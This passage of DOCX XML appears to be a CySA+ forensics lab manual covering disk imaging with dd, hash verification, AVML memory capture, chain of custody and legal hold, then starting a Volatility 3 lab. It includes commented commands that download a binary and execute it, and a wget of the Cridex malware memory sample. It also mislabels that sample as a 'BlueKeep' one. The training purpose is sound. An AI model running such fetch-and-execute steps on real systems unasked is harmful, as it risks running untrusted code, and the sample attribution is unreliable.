        <w:t>md5sum    /tmp/evidence/suspect.img | tee -a /tmp/case_001/source.md5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Both hashes are recorded — MD5 for legacy compatibility, SHA-256 for cryptographic strength.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Make a bit-for-bit image (acquisition)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dd if=/tmp/evidence/suspect.img of=/tmp/case_001/image.dd bs=1M status=progress conv=noerror,sync</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Real engagements use a hardware write-blocker plus dcfldd or dc3dd (FTK Imager on Windows) — they hash on-the-fly and log every read error. The principle is the same: never write to the source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Verify integrity (validating data integrity)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum /tmp/case_001/image.dd | tee /tmp/case_001/image.sha256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>diff /tmp/case_001/source.sha256 &lt;(sed 's|image.dd|/tmp/evidence/suspect.img|' /tmp/case_001/image.sha256) \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  &amp;&amp; echo "INTEGRITY OK" || echo "INTEGRITY FAILED"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If the hashes match, the image is admissible. If not, you start over.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Capture volatile memory (memory acquisition)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In Linux the standard free tools are:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt install -y avml 2&gt;/dev/null || echo "avml may need manual install"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># AVML is Microsoft's free Linux memory acquirer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># wget https://github.com/microsoft/avml/releases/latest/download/avml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># chmod +x ./avml &amp;&amp; ./avml /tmp/case_001/memory.lime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>On Windows the equivalent free tools are WinPMEM, DumpIt, or Magnet RAM Capture. Always hash the resulting .lime / .raw file the same way as the disk image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Build the chain-of-custody form</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; /tmp/case_001/chain_of_custody.md &lt;&lt;EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Chain of Custody — Case 001</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Item | Value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Case ID | CASE-001 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Incident date | $(date -I) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Evidence ID | EV-001 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Description | 8 MB disk image, ext4, mounted /mnt/suspect at acquisition |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Acquirer | Analyst A. Chan |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Acquisition method | dd (bit-for-bit) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Source SHA-256 | $(awk '{print $1}' /tmp/case_001/source.sha256) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Image  SHA-256 | $(awk '{print $1}' /tmp/case_001/image.sha256) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Integrity | $(diff -q /tmp/case_001/source.sha256 &lt;(sed 's|image.dd|/tmp/evidence/suspect.img|' /tmp/case_001/image.sha256) &gt;/dev/null &amp;&amp; echo MATCH || echo MISMATCH) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Storage location | Locked evidence safe, drawer 3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Transfer log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Datetime | From | To | Reason | Signature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$(date -Iseconds) | Analyst A. Chan | Evidence Locker | Initial seal | _________ |</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cat /tmp/case_001/chain_of_custody.md</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Every transfer of the evidence (analyst → locker → court) gets a new row. A gap in the log is enough to throw out the evidence in court.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Legal hold</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A legal hold suspends normal retention policies for evidence relevant to litigation or regulatory request. Once issued by legal counsel:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No deletion, no rotation, no overwriting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>All custodians notified in writing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Original media stored in a sealed evidence bag with the tag from Step 7.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In Linux that means moving the image to a write-protected store:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chmod -w /tmp/case_001/image.dd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ls -l /tmp/case_001/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Working copies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You analyse the working copy, never the original.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cp /tmp/case_001/image.dd /tmp/case_001/working_copy.dd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum /tmp/case_001/working_copy.dd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If your analysis corrupts the working copy, you can always recreate it from the sealed original.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The order of volatility and why it dictates acquisition sequence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to image a disk with dd and verify with SHA-256.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Where Linux/Windows memory acquisition tools live.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to fill a chain-of-custody form and apply a legal hold.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If the hashes match, the image is admissible. If not, you start over.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 22 — Memory Forensics with Volatility</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analyse a memory image with Volatility 3 — listing processes, network connections, command lines, and pulling DLLs / injected code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will analyse a memory image with Volatility 3 — listing processes, network connections, command lines, and pulling DLLs / injected code. Memory forensics finds artefacts that never touched disk (Cobalt Strike beacons, in-memory shellcode). This maps to CySA+ 3.2 (Data and log analysis, Evidence acquisitions — Preservation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="2365703"/>
            <wp:docPr id="20" name="Picture 20"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_5e96aa3087.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2365703"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install Volatility 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y python3-pip git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pip3 install volatility3 --break-system-packages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vol -h | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Volatility 3 is a complete rewrite in Python 3 with built-in symbol management — no manual profile required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Obtain a sample memory image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Public training images are large but free. Two reliable sources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Volatility Foundation sample memory — https://github.com/volatilityfoundation/volatility/wiki/Memory-Samples</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MalwareTech BlueKeep sample — search for cridex.vmem / xp-laptop-2005.img</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Example download (~30 MB):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>wget -q -O /tmp/cridex.vmem \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  https://downloads.volatilityfoundation.org/releases/Tutorial/cridex.vmem 2&gt;/dev/null \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  || echo "Mirror may be down — provide your own image"</w:t>
